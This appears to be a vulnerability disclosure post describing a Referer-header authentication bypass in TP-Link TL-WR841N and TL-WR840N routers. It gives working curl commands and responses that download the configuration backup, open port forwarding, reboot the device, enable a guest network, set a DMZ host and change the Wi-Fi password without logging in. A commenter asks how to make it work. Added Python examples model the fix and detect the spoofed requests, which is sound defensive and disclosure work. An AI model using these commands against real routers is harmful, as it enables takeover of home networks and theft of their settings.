Hello Folks,
We are the BlackFog Team. A few days ago one of our team members found a very interesting bug in TP-Link Wi-Fi home routers that gives full control of the router without logging in to the router’s admin panel. In short, we can bypass the authentication mechanism using a simple trick.
TP-Link is the world’s #1 provider of consumer WiFi networking devices, shipping products to over 120 countries and hundreds of millions of customers. (source https://www.tp-link.com/)
Hardware: TL-WR841N v13 00000013
Firmware Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n
Hardware: TL-WR840N v5 00000005
Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
This issue is caused by improper session handling on the /cgi/ folder (or /cgi file). The bug was found by Touhid Shaikh. If an attacker sends a Referer header with the request and sets it to Referer: http://192.168.0.1/mainFrame.htm, no authentication is required and the attacker can perform the router’s actions without authenticating. Below are a few examples, but the attacker can perform almost every action on the router without authentication.
NOTE: The exception is changing the admin’s password, because that requires the current password.
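To make the design flaw concrete, here is an added example (not code from the BlackFog post and not TP-Link firmware) that models the broken decision and its fix. The real firmware logic is not public, so `referer_only_check` is an assumption about its shape: a request is authorised purely because it claims to come from the admin frame. `session_and_origin_check` is the hardened form, in which authorisation comes only from a server-side session and the Referer/Origin comparison is a separate CSRF layer applied to state-changing requests. The session store, cookie name, and admin credential are all constructed for the example.

```python
"""
Added example: Referer-as-authentication (the flaw) versus a session check
with Referer/Origin used only as a CSRF layer (the fix).
"""
import hmac
import secrets
from typing import Callable, Dict, Optional
from urllib.parse import urlsplit

DEVICE_HOST = "192.168.0.1"
TRUSTED_REFERER = f"http://{DEVICE_HOST}/mainFrame.htm"

# Constructed server-side session store: token -> username.
_SESSIONS: Dict[str, str] = {}
# Hypothetical admin credential for this example only.
_ADMIN_PASSWORD = "example-password"


def login(username: str, password: str) -> Optional[str]:
    """Constructed credential check; returns a session token on success."""
    if username == "admin" and hmac.compare_digest(password, _ADMIN_PASSWORD):
        token = secrets.token_hex(16)
        _SESSIONS[token] = username
        return token
    return None


def session_token(headers: Dict[str, str]) -> str:
    """Pull the 'session' cookie value out of the Cookie header ('' if absent)."""
    for part in headers.get("Cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session":
            return value
    return ""


def referer_only_check(method: str, headers: Dict[str, str]) -> bool:
    """Flawed check (assumed shape of the bug): a client-controlled header
    is taken as proof that the caller is logged in."""
    return headers.get("Referer", "") == TRUSTED_REFERER


def session_and_origin_check(method: str, headers: Dict[str, str]) -> bool:
    """Hardened check: a valid session is mandatory. Referer/Origin is looked
    at only afterwards, and only to block cross-site state changes."""
    if session_token(headers) not in _SESSIONS:
        return False
    if method in ("POST", "PUT", "DELETE"):
        source = headers.get("Origin") or headers.get("Referer", "")
        return urlsplit(source).hostname == DEVICE_HOST
    return True


Check = Callable[[str, Dict[str, str]], bool]


def handle_cgi(method: str, headers: Dict[str, str], check: Check) -> int:
    """Status the /cgi handler would return for this request under `check`."""
    return 200 if check(method, headers) else 403


if __name__ == "__main__":
    spoofed = {"Referer": TRUSTED_REFERER}          # no session at all
    print(handle_cgi("GET", spoofed, referer_only_check))         # 200: bypass
    print(handle_cgi("GET", spoofed, session_and_origin_check))   # 403
    token = login("admin", _ADMIN_PASSWORD)
    logged_in = {"Cookie": f"session={token}", "Referer": TRUSTED_REFERER}
    print(handle_cgi("POST", logged_in, session_and_origin_check))  # 200
```

The point of the second check is ordering: Referer and Origin are sent by the client and are trivially set by any HTTP tool, so they can only ever narrow what an already-authenticated session may do, never establish who the caller is.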
In this PoC our team tries to download the router’s backup file, which contains all of its settings, as a .bin file.
Below we show the FAILED and the SUCCESSFUL attempts made by our team.
—————————————- FAIL ———————————-
root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Content-Length: 106
Connection: close
<html><head><title>403 Forbidden</title></head><body><center><h1>403
Forbidden</h1></center></body></html>
————————————————————————————-
———————————– SUCCESSFUL —————————-
root@linux:/workspace# curl -i -s -k -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5984
Connection: keep-alive
root@linux:/workspace# curl -s -k -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin > backup.bin
root@linux:/workspace# file backup.bin
backup.bin: data
root@linux:/workspace# ls -la backup.bin
-rw-r--r-- 1 root root 5720 Mar 30 17:17 backup.bin
—————————————————————
After successfully downloading the backup file, our team tried further actions on the router using the same trick.
Below are some actions we successfully performed on the router.
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:Mozilla/Agent22" -H 'Accept: */*' -H "Referer:http://192.168.0.1/mainFrame.htm" --data-binary $'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP or UDP\x0d\x0aopenProtocol=TCP or UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
—– Description —–
enable=0 is for disable
enable=1 is for enable
You can also change the port.
====================================
=============== Reboot Router =====================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:Mozilla/Agent22" -H 'Accept: */*' -H "Referer:http://192.168.0.1/mainFrame.htm" --data-binary $'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[error]0
—– Description —–
error = 0 means the reboot was successful
======================================
============= Enable Guest Network =====================
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H $'Connection: close' --data-binary $'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a' $'http://192.168.0.1/cgi?2&2&2&2&2'
——- Description ———-
SSID=Agent22
PreSharedKey=9876543210
=============================================
======= DMZ enable and Disable on 192.168.0.112 ===========
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 78' -H $'Connection: close' --data-binary $'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a' $'http://192.168.0.1/cgi?2'

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close

[error]0
——-Description ———–
IPAddress=192.168.0.112
enable=1 or 0 (enable or disable)
=================================================
=============== WiFi Password Change =============
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 199' -H $'Connection: close' --data-binary $'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a' $'http://192.168.0.1/cgi?2'
——-Description ———–
IEEE11iAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
X_TP_PreSharedKey=9876543210
===============================
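For anyone running these routers behind a proxy or with request logging, the requests above share one detectable shape: a hit on a /cgi path that carries the mainFrame.htm Referer but no credential. The following is an added triage script (not part of the BlackFog post and not TP-Link code) that walks constructed request records and reports each such request together with the configuration object its body targets, using the object names that appear in the PoC bodies above. The record layout is an assumption of this example; so is the cookie name "Authorization", taken from the reply quoted in the comment below the post.

```python
"""
Added example: flag unauthenticated /cgi requests that rely on a spoofed
Referer, and label which configuration object each one touches.
"""
import re
from typing import Any, Dict, List

TRUSTED_REFERER = "http://192.168.0.1/mainFrame.htm"

# Objects named in the PoC request bodies above; the labels are ours.
ACTION_LABELS = {
    "IP_CONN_PORTTRIGGERING": "port triggering / forwarding",
    "ACT_REBOOT": "router reboot",
    "LAN_WLAN_MULTISSID": "guest network",
    "LAN_WLAN_MSSIDENTRY": "guest network",
    "LAN_WLAN_GUESTNET": "guest network",
    "DMZ_HOST_CFG": "DMZ host",
    "LAN_WLAN": "main Wi-Fi settings",
}

# Each object in a body opens with "[OBJECT_NAME#...#...]".
_OBJECT_RE = re.compile(r"\[([A-Z0-9_]+)#")


def has_session(headers: Dict[str, str]) -> bool:
    """True if the Cookie header carries a non-empty Authorization value
    (assumed cookie name; an empty value is what the logout reply sets)."""
    for part in headers.get("Cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "Authorization" and value:
            return True
    return False


def describe_body(body: str) -> List[str]:
    """Map the objects touched by a /cgi body to labels, in order, no repeats."""
    labels: List[str] = []
    for name in _OBJECT_RE.findall(body):
        label = ACTION_LABELS.get(name, f"unknown object {name}")
        if label not in labels:
            labels.append(label)
    return labels


def triage(records: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """One finding per /cgi request that has the spoofed Referer and no session."""
    findings: List[Dict[str, Any]] = []
    for rec in records:
        headers: Dict[str, str] = rec["headers"]
        path = str(rec["path"])
        if not path.startswith("/cgi"):
            continue
        if headers.get("Referer") != TRUSTED_REFERER:
            continue
        if has_session(headers):
            continue                      # legitimate logged-in request
        body = str(rec.get("body", ""))
        findings.append({
            "src": rec["src"],
            "request": f"{rec['method']} {path}",
            "actions": describe_body(body) or [f"access to {path}"],
        })
    return findings


# Constructed sample traffic; client addresses and the token are placeholders.
SAMPLE_RECORDS: List[Dict[str, Any]] = [
    {"src": "192.168.0.50", "method": "GET", "path": "/cgi/conf.bin",
     "headers": {"Referer": TRUSTED_REFERER}},
    {"src": "192.168.0.50", "method": "POST", "path": "/cgi?7",
     "headers": {"Referer": TRUSTED_REFERER, "Content-Type": "text/plain"},
     "body": "[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n"},
    {"src": "192.168.0.10", "method": "POST", "path": "/cgi?2",
     "headers": {"Referer": TRUSTED_REFERER,
                 "Cookie": "Authorization=Basic%20EXAMPLE-TOKEN"},
     "body": "[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nenable=1\r\n"},
    {"src": "192.168.0.10", "method": "GET", "path": "/mainFrame.htm",
     "headers": {"Cookie": "Authorization=Basic%20EXAMPLE-TOKEN"}},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"{f['src']} {f['request']} -> {', '.join(f['actions'])}")
```

On the sample traffic only the two requests from 192.168.0.50 are reported: the backup download and the reboot. The DMZ change from 192.168.0.10 carries a credential and is left alone, which is the distinction that matters when deciding whether a configuration change on a device like this was made by its owner.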
Update to the latest firmware today. 😉
30 Mar, 2018 —– Initial Report (support.in@tp-link.com) (No Response)
27 May, 2018 —– Full Disclosure (Exploit-DB)
Don’t use our PoC for evil activity. We are not responsible for any damage and we do not support any malicious activity.
Thank you for reading.
1 Comment
Hi, I tried the above and had the following response:
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
Content-Type: application/octet-stream
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
window.parent.document.cookie="Authorization=;path=/";
window.parent.location.href = "http://192.168.0.1";
Is it successful or not? Because the conf file is empty. What can I do to succeed? Thanks